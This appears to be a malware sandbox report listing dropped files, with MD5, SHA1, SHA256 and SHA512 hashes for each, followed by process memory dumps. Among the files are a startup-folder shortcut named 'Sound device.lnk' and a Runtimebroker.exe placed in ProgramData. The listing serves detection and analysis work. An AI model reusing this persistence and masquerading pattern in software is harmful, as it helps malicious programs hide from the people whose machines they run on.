5fdfd384bae55034d36dc7269cd21f67

SHA1
30180cfc7746bbd3b7530ac3bb6ababeccb41f7c

SHA256
9f8f6b6b70f54ddb9e4e1ce8cdbddc563eb760b64b9a236563cad8a15fee7ad6

SHA512
c6185a8c3f492692fe9bd2af321b84877743f85707a5bf025639ffabf98e3c4e866d89514e99653be749023be08d239f33253988ce7a0899e296896030c093c2

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
MD5
5fdfd384bae55034d36dc7269cd21f67

SHA1
30180cfc7746bbd3b7530ac3bb6ababeccb41f7c

SHA256
9f8f6b6b70f54ddb9e4e1ce8cdbddc563eb760b64b9a236563cad8a15fee7ad6

SHA512
c6185a8c3f492692fe9bd2af321b84877743f85707a5bf025639ffabf98e3c4e866d89514e99653be749023be08d239f33253988ce7a0899e296896030c093c2

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound device.lnk
MD5
571bd3a676d9dda48bb1ade6d4df8146

SHA1
56f04fb29ddceb65d0a3882787dc43c2ad35fc1a

SHA256
a9a44db94e319371042e6ea24ba55af5fff391119da54ebb48e6a5a0085bda80

SHA512
cfc6e99b8b52496c21b66f6b40d234c0398c8f1ffcb6172a188bc36fdd4c418dd1d8f6aefff5c6e709427189107fdf3c947db10386d86177f4c15298f703b3a4

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\ProgramData\Runtimebroker.exe
MD5
ab2f76d60587996ba3cd8782785caaa5

SHA1
0ff116d90610baae4db4d72f6ac11989b7a0e420

SHA256
34a8beebd1799b5fb7b9651fc77e8ce7261b111bd3d91ccb8558910925aa2db7

SHA512
c2e71e373c0ca83dc4b3e045a765dc35cee35549d84250911c78d13c2191d1a836a9554bd63e5faae78a3393a3d86d7e432f05a2caf9c0c224d0d50673cc5392

Download Submit
\ProgramData\Runtimebroker.exe
MD5
ab2f76d60587996ba3cd8782785caaa5

SHA1
0ff116d90610baae4db4d72f6ac11989b7a0e420

SHA256
34a8beebd1799b5fb7b9651fc77e8ce7261b111bd3d91ccb8558910925aa2db7

SHA512
c2e71e373c0ca83dc4b3e045a765dc35cee35549d84250911c78d13c2191d1a836a9554bd63e5faae78a3393a3d86d7e432f05a2caf9c0c224d0d50673cc5392

Download Submit
\ProgramData\Runtimebroker.exe
MD5
ab2f76d60587996ba3cd8782785caaa5

SHA1
0ff116d90610baae4db4d72f6ac11989b7a0e420

SHA256
34a8beebd1799b5fb7b9651fc77e8ce7261b111bd3d91ccb8558910925aa2db7

SHA512
c2e71e373c0ca83dc4b3e045a765dc35cee35549d84250911c78d13c2191d1a836a9554bd63e5faae78a3393a3d86d7e432f05a2caf9c0c224d0d50673cc5392

Download Submit
\Users\Admin\AppData\Local\Temp\66A.exe
MD5
5707ddada5b7ea6bef434cd294fa12e1

SHA1
45bb285a597b30e100ed4b15d96a29d718697e5e

SHA256
85205aa3ad824b5172d5da841d253c3a54aff5d00eb2c208029e9453008f132c

SHA512
91cbdbf8da7e4e34de45a99359bdc321a66d6646ed14a1042346824c8daa6237281eff3b00fd162009c5e3204e5a7cd3b944f05e18b7f9066d0f9dd16b56bf13

Download Submit
memory/380-64-0x0000000000000000-mapping.dmp

Download
memory/752-87-0x0000000000000000-mapping.dmp

Download
memory/752-96-0x0000000002870000-0x0000000002871000-memory.dmp

Filesize
4KB

Download
memory/752-93-0x0000000000120000-0x0000000000121000-memory.dmp

Filesize
4KB

Download
memory/1012-167-0x0000000000000000-mapping.dmp

Download
memory/1012-183-0x0000000000400000-0x0000000002CA9000-memory.dmp

Filesize
40.7MB

Download
memory/1012-181-0x0000000000350000-0x00000000003E1000-memory.dmp

Filesize
580KB

Download
memory/1028-180-0x0000000000400000-0x0000000000495000-memory.dmp

Filesize
596KB

Download
memory/1028-164-0x000000000044003F-mapping.dmp

Download
memory/1028-163-0x0000000000400000-0x0000000000495000-memory.dmp

Filesize
596KB

Download
memory/1208-63-0x0000000002A30000-0x0000000002A46000-memory.dmp

Filesize
88KB

Download
memory/1284-95-0x0000000004BE0000-0x0000000004BE1000-memory.dmp

Filesize
4KB

Download
memory/1284-158-0x0000000000500000-0x0000000000521000-memory.dmp

Filesize
132KB

Download
memory/1284-81-0x0000000000000000-mapping.dmp

Download
memory/1284-85-0x0000000001000000-0x0000000001001000-memory.dmp

Filesize
4KB

Download
memory/1296-148-0x0000000006110000-0x0000000006111000-memory.dmp

Filesize
4KB

Download
memory/1296-79-0x0000000000220000-0x000000000025B000-memory.dmp

Filesize
236KB

Download
memory/1296-68-0x0000000000000000-mapping.dmp

Download
memory/1296-130-0x0000000000000000-mapping.dmp

Download
memory/1296-80-0x0000000000400000-0x0000000002C7C000-memory.dmp

Filesize
40.5MB

Download
memory/1296-149-0x0000000006550000-0x00000000066AB000-memory.dmp

Filesize
1.4MB

Download
memory/1296-134-0x0000000002010000-0x0000000002011000-memory.dmp

Filesize
4KB

Download
memory/1296-135-0x0000000004B20000-0x0000000004B21000-memory.dmp

Filesize
4KB

Download
memory/1296-136-0x0000000004AE0000-0x0000000004AE1000-memory.dmp

Filesize
4KB

Download
memory/1296-137-0x0000000004AE2000-0x0000000004AE3000-memory.dmp

Filesize
4KB

Download
memory/1296-138-0x0000000002630000-0x0000000002631000-memory.dmp

Filesize
4KB

Download
memory/1296-140-0x0000000004850000-0x0000000004851000-memory.dmp

Filesize
4KB

Download
memory/1504-100-0x0000000000000000-mapping.dmp

Download
memory/1516-71-0x0000000000000000-mapping.dmp

Download
memory/1516-91-0x0000000000400000-0x0000000002D86000-memory.dmp

Filesize
41.5MB

Download
memory/1516-90-0x00000000030E0000-0x0000000003323000-memory.dmp

Filesize
2.3MB

Download
memory/1516-97-0x0000000004DE0000-0x0000000004FF1000-memory.dmp

Filesize
2.1MB

Download
memory/1516-98-0x0000000000400000-0x0000000002D86000-memory.dmp

Filesize
41.5MB

Download
memory/1632-170-0x00000000057A0000-0x00000000057A1000-memory.dmp

Filesize
4KB

Download
memory/1632-155-0x0000000001F00000-0x0000000002B4A000-memory.dmp

Filesize
12.3MB

Download
memory/1632-174-0x00000000057E0000-0x00000000057E1000-memory.dmp

Filesize
4KB

Download
memory/1632-150-0x0000000000000000-mapping.dmp

Download
memory/1652-84-0x0000000000400000-0x0000000002C7C000-memory.dmp

Filesize
40.5MB

Download
memory/1652-76-0x0000000000000000-mapping.dmp

Download
memory/1700-59-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/1700-61-0x0000000075511000-0x0000000075513000-memory.dmp

Filesize
8KB

Download
memory/1700-60-0x0000000000402E1A-mapping.dmp

Download
memory/1772-171-0x0000000000000000-mapping.dmp

Download
memory/1772-182-0x000000006B051000-0x000000006B053000-memory.dmp

Filesize
8KB

Download
memory/1784-119-0x0000000006100000-0x0000000006101000-memory.dmp

Filesize
4KB

Download
memory/1784-120-0x000000007EF30000-0x000000007EF31000-memory.dmp

Filesize
4KB

Download
memory/1784-128-0x0000000006280000-0x0000000006281000-memory.dmp

Filesize
4KB

Download
memory/1784-107-0x00000000049B0000-0x00000000049B1000-memory.dmp

Filesize
4KB

Download
memory/1784-114-0x0000000006080000-0x0000000006081000-memory.dmp

Filesize
4KB

Download
memory/1784-121-0x0000000006160000-0x0000000006161000-memory.dmp

Filesize
4KB

Download
memory/1784-109-0x0000000004972000-0x0000000004973000-memory.dmp

Filesize
4KB

Download
memory/1784-111-0x0000000002440000-0x0000000002441000-memory.dmp

Filesize
4KB

Download
memory/1784-110-0x0000000000DD0000-0x0000000000DD1000-memory.dmp

Filesize
4KB

Download
memory/1784-104-0x0000000000000000-mapping.dmp

Download
memory/1784-106-0x0000000000520000-0x0000000000521000-memory.dmp

Filesize
4KB

Download
memory/1784-108-0x0000000004970000-0x0000000004971000-memory.dmp

Filesize
4KB

Download
memory/2000-62-0x0000000000020000-0x000000000002A000-memory.dmp

Filesize
40KB

Download